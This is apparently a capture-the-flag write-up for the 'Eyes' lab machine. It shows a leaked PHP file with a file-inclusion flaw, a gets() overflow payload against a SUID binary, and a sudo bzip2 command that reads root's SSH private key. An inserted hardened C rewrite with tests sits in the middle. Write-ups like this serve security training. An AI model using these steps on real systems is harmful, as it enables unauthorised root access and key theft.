HMV Eyes summary

2026-04-19 · 199 Words

This machine leaks its web source code over the FTP service, which reveals an LFI vulnerability that can be turned into RCE. A buffer overflow in a SUID program then lets me move laterally to a normal user, whose misconfigured sudo rule elevates me to root.

Scope

  • Name: Eyes
  • Difficulty: (3/10)
  • OS: Linux
  • IP: eyes.hmv (192.168.56.140)

Enumeration

Scanning with nmap shows that anonymous login is enabled on the FTP service.

21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             125 Apr 04  2021 index.php

After downloading that file I realize there's an LFI vulnerability.

<?php
$file = $_GET['fil3'];
if(isset($file))
{
include($file);
}
else
{
print("Here my eyes...");
}
?>
<!--Monica's eyes-->

According to the HackTricks write-up, this LFI can be escalated to RCE, which is how I obtain the initial foothold on the system.

Privilege Escalation

Buffer Overflow

I quickly find a SUID program with a buffer overflow vulnerability.

www-data@eyes:~/html$ find / -mount -perm -u=s 2>/dev/null
/opt/ls
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/umount
/usr/bin/chsh

The /opt/ls program with the SUID bit set catches my eye.

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char v4[64]; // [rsp+0h] [rbp-F0h] BYREF
  char src[12]; // [rsp+40h] [rbp-B0h] BYREF
  int v6; // [rsp+4Ch] [rbp-A4h]
  __int64 v7; // [rsp+50h] [rbp-A0h]
  __int64 v8; // [rsp+58h] [rbp-98h]
  __int64 v9; // [rsp+60h] [rbp-90h]
  __int64 v10; // [rsp+68h] [rbp-88h]
  __int16 v11; // [rsp+70h] [rbp-80h]
  char dest[112]; // [rsp+80h] [rbp-70h] BYREF

  strcpy(src, "/usr/bin/ls");
  v6 = 0;
  v7 = 0;
  v8 = 0;
  v9 = 0;
  v10 = 0;
  v11 = 0;
  printf("Enter your name:");
  gets(v4);                                   // unbounded read into the 64-byte buffer v4
  strcpy(dest, src);
  setuid(1000u);
  setgid(1000u);
  printf("Hi %s, Im executing ls\n Output:\n", v4);
  system(dest);
  return 0;
}

The gets call is what tells me there is a buffer overflow vulnerability here.

gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte ('\0').

The gets manual tells me the terminating newline is replaced with '\0', so I can overflow straight into the command string that system executes (src, which strcpy copies into dest). The offset is 64!

python -c "print('A'*64 + 'bash')" # payload
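As an added example (not the binary from the box, and not the author's code), the C program below is a hardened rewrite of the decompiled logic: a bounded fgets-based reader replaces gets, the privilege drop to uid/gid 1000 is done group-first and checked, and execv with a fixed absolute path replaces system so nothing typed at the prompt can become part of the command. The 64-byte buffer, uid 1000 and the prompt come from the listing; the struct layout, function names and the constructed sample inputs are assumptions of this example. A check function feeds the same 64 'A' + "bash" input shape through the reader and confirms the adjacent command string stays untouched.

```c
/* Hardened rewrite of the /opt/ls logic (added example, not the box's binary). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define NAME_MAX_LEN 64   /* same size as v4 in the decompiled listing */

enum name_result { NAME_OK = 0, NAME_EMPTY = 1, NAME_TOO_LONG = 2 };

/* Assumed layout mirroring the original: the command string sits directly
 * after the name buffer, so any write past name[] would land in cmd[]. */
struct ls_ctx {
    char name[NAME_MAX_LEN];
    char cmd[16];
};

/* Bounded replacement for gets(): reads at most size-1 bytes with fgets(),
 * strips the trailing newline, and reports a line that did not fit instead
 * of letting it spill into whatever follows the buffer. */
enum name_result read_name(char *name, size_t size, FILE *in)
{
    if (fgets(name, (int)size, in) == NULL) {
        name[0] = '\0';
        return NAME_EMPTY;
    }
    size_t len = strlen(name);
    if (len > 0 && name[len - 1] == '\n') {
        name[len - 1] = '\0';
        return len > 1 ? NAME_OK : NAME_EMPTY;
    }
    /* No newline within size-1 bytes: either the line fit exactly or it is
     * over-long. Peek one byte to tell the two apart, then drain the rest. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return NAME_OK;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;
    name[0] = '\0';
    return NAME_TOO_LONG;
}

/* Feed a constructed string through read_name() as if it were stdin. */
enum name_result read_name_from_string(const char *input, char *name, size_t size)
{
    FILE *in = tmpfile();
    if (in == NULL) { name[0] = '\0'; return NAME_EMPTY; }
    fputs(input, in);
    rewind(in);
    enum name_result r = read_name(name, size, in);
    fclose(in);
    return r;
}

/* Returns 1 when a normal name is read back intact (constructed input). */
int short_name_is_accepted(void)
{
    char name[NAME_MAX_LEN];
    return read_name_from_string("monica\n", name, sizeof name) == NAME_OK
        && strcmp(name, "monica") == 0;
}

/* Returns 1 when the 64 'A' + "bash" input shape is rejected and the
 * adjacent command buffer still holds "/usr/bin/ls" (constructed input). */
int overlong_input_leaves_cmd_intact(void)
{
    struct ls_ctx ctx;
    memset(&ctx, 0, sizeof ctx);
    strcpy(ctx.cmd, "/usr/bin/ls");
    char input[NAME_MAX_LEN + 8];
    memset(input, 'A', NAME_MAX_LEN);
    strcpy(input + NAME_MAX_LEN, "bash\n");
    return read_name_from_string(input, ctx.name, sizeof ctx.name) == NAME_TOO_LONG
        && strcmp(ctx.cmd, "/usr/bin/ls") == 0;
}

/* Drop privileges group-first and check both calls: an unchecked failed
 * setuid() in a SUID binary would leave the process running as the owner. */
int drop_to_user(uid_t uid, gid_t gid)
{
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    return 0;
}

int main(void)
{
    char name[NAME_MAX_LEN];
    printf("Enter your name:");
    fflush(stdout);
    if (read_name(name, sizeof name, stdin) != NAME_OK) {
        fprintf(stderr, "name must be 1..%d characters\n", NAME_MAX_LEN - 1);
        return 1;
    }
    if (drop_to_user(1000, 1000) != 0) {   /* uid/gid 1000 as in the listing */
        perror("drop_to_user");
        return 1;
    }
    printf("Hi %s, I'm executing ls\n Output:\n", name);
    fflush(stdout);
    /* Fixed absolute path and no shell: user input never reaches a command line. */
    char *const args[] = { "/usr/bin/ls", NULL };
    execv(args[0], args);
    perror("execv");
    return 1;
}
```

Build with `gcc -Wall -o ls_hardened ls_hardened.c`; the two check functions run without root, and drop_to_user() succeeds for a process that is already the target user, which is what the stand-alone test exercises.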

Monica -> root

After moving laterally to the normal user (uid=1000), I quickly discover a misconfigured sudo rule for bzip2. Following GTFOBins, I try to read root's private key. Yes, it is there!

monica@eyes:~$ sudo /usr/bin/bzip2 -c /root/.ssh/id_rsa | bzip2 -d
